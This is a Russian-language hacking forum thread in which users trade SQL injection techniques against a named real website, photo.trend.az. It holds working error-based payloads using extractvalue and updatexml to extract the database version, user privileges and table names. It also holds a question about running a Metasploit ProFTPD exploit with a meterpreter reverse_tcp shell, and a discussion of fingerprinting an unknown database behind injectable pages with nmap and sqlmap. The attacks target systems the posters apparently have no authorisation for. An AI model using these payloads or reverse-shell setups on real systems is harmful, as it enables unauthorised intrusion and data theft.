 |
|
13.03.2014, 17:43
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от psihoz26
Помогите раскрутить
Кавычку в начале поставил для вывода ошибки.
Вместо сортировки по столбцам сортируется по словам из сообщений под фото.
Запрос обрезается таким набором символов - %00+--+
Код:
http://%host%/az/search/?query='1+IN+STRING+MODE%29+order+by+150%00+--+
%host% =photo.trend.az
....
Сообщение от None
query=1'*(extractvalue(1,concat(0x3a,verSion())))* '&x=0&y=0
|
|
|
13.03.2014, 18:33
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
YaBtr где можно почитать про extractvalue?
?query=1'*(extractvalue(1,concat(0x3a,uSer(),0x3a, file_priv)+from+mySql.uSer))*%20'&x=0&y=0
почему не работает? синтаксис у меня кривой или прав нету?
|
|
|
|
13.03.2014, 18:53
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от psihoz26
YaBtr
где можно почитать про extractvalue?
?query=1'*(extractvalue(1,concat(0x3a,uSer(),0x3a, file_priv)+from+mySql.uSer))*%20'&x=0&y=0
почему не работает? синтаксис у меня кривой или прав нету?
1. И синтаксис кривой и прав не хватает.
2. http://dev.mysql.com/doc/refman/5.1/en/xml-functions.html
Там же написано об updatexml.
Сообщение от None
?query=1'*(updatexml(1,concat(0x3a,(Select+table_n ame+from+information_Schema.tableS limit 1)),4))*'&x=0&y=0
|
|
|
|
13.03.2014, 21:49
|
|
Новичок
Регистрация: 19.01.2014
Сообщений: 17
С нами:
6481046
Репутация:
0
|
|
Юзаю вот этот сплойт proftp_telnet_iac+meterpreter/reverse_tcp. Какой порт нужно прописывать в reverse_tcp(LPORT)? И нужно ли его открывать ?
|
|
|
|
13.03.2014, 23:09
|
|
Новичок
Регистрация: 12.02.2013
Сообщений: 21
С нами:
6972086
Репутация:
0
|
|
Подскажите Парсер сайтов(приват или паблик) зареганных в LIVEINTERNET,TOPMAIL,TOP100RAMBLER,HOTLOG
|
|
|
|
14.03.2014, 00:33
|
|
Новичок
Регистрация: 02.11.2012
Сообщений: 1
С нами:
7118966
Репутация:
0
|
|
SQL движок
Есть несколько скулей типа:
host.com/page.php?id=19' and 1=(select 1) --
движок например точно не mysql - запрос c /*!00000 some_shit */ срабатывает - если бы был мускул, была бы ошибка в синтаксисе - some_shit,
ни Oracle - запрос host.com/page.php?id=19' and 1=(select 1 from sys.dual) -- не работает.
если бы была mssql или postgre, то в большинстве случаев сработал бы запрос с Select из таблицы information_schema.tables - host.com/page.php?id=19' and 1=(select 1 from information_schema.tables) но не работает.
и ещё одна особенность - и ни в одной из скуль не проходит запрос с ORDER BY.
что это может быть за движок?
|
|
|
|
14.03.2014, 00:35
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от JohnnnDoe
Есть несколько скулей типа:
host.com/page.php?id=19' and 1=(select 1) --
движок например точно не
mysql
- запрос /*!00000 some_shit */ не срабатывает,
ни
Oracle
- запрос host.com/page.php?id=19' and 1=(select 1 from sys.dual) -- не работает.
если бы была
mssql
или
postgre
, то в большинстве случаев сработал бы запрос с Select из таблицы
information_schema.tables
- host.com/page.php?id=19' and 1=(select 1 from information_schema.tables) но не работает.
и ещё одна особенность - и ни в одной из скуль не проходит запрос с
ORDER BY
.
что это может быть за движок?
Движок или субд? Ссылку в студию\пм, посмотрим на ваш движок и на субд. Причин для невыполнения упомнутых запросов может быть масса, и большая часть не относится непосредственно к самой субд.
|
|
|
|
14.03.2014, 00:42
|
|
Новичок
Регистрация: 02.11.2012
Сообщений: 1
С нами:
7118966
Репутация:
0
|
|
madhatter, СУБД.
сайт находится в локалке, так что от ссылки, к сожалению, не будет толку.
Если представить, что запрос не фильтруется, то для какой СУБД характерно такое поведение?
Ещё очень характерная особенность!
срабатывает такой запрос:
[COLOR="Green"]host.com/page.php?id=19' and 1
|
|
|
|
14.03.2014, 01:01
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
[QUOTE="JohnnnDoe"]
madhatter
, СУБД.
сайт находится в локалке, так что от ссылки, к сожалению, не будет толку.
Если представить, что запрос не фильтруется, то для какой СУБД характерно такое поведение?
Ещё очень характерная особенность!
срабатывает такой запрос:
[COLOR="Green"]host.com/page.php?id=19' and 1
|
|
|
|
14.03.2014, 01:18
|
|
Новичок
Регистрация: 02.11.2012
Сообщений: 1
С нами:
7118966
Репутация:
0
|
|
Сообщение от None
Целевой хост по портам сканировали? select version() делали? Часто субд выбирают вместе с операционкой. Ос на цели какая?
nmap определил как Linux. Но это ни о чём не говорит - скрипт на целевом хосте может легко коннектится к БД на другом сервере. Скрипты платные. PHP, Apache.
Спасибо за подсказку про sqlmap.
Но, судя по всему, это какая-то специфичная/малораспространённая в веб-проектах СУБД.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
